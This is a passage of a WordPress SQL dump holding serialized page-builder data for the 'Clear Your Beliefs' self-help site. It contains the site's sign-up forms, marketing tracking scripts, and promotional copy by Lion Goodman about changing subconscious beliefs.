will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1567, 2019, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1696:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong><br />for iPhone & iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1452:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1548, 2003, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60547:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old 